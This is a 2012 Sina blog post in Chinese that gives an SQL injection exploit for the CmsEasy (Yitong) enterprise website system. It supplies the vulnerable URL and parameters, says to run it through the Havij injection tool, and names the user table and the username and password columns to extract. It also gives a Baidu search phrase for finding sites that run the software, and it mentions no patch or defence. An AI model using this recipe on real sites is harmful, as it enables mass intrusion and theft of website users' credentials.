易通企业网站系统最新注入漏洞_思想夜话_新浪博客

新浪博客

加载中…

http://blog.sina.com.cn/u/2622399101

首页博文目录关于我

个人资料

微博

加好友发纸条

写留言加关注

博客等级：
博客积分：

博客访问：
关注人气：
获赠金笔：0支
赠出金笔：0支
荣誉徽章：

正文字体大小：大中小

易通企业网站系统最新注入漏洞

(2012-08-09 07:45:25)

标签：

it

分类：技术文章

易通企业网站系统最新注入漏洞。

注入EXP:

http://www.xxxxxx.com/celive/js/include.php?cmseasylive=1111&departmentid=0

直接放Havij里面跑。错误关键字:online.gif

添加表名：cmseasy_user

列表：userid,username,password

百度关键字：Powered by CmsEasy

阅读┊ 收藏 ┊ 喜欢 ▼ ┊打印┊举报/Report

前一篇：黑客攻破NFC，可随意打开恶意网站

后一篇：Hosts文件

新浪BLOG意见反馈留言板　欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

Copyright © 1996 - 2022 SINA Corporation, All Rights Reserved

新浪公司版权所有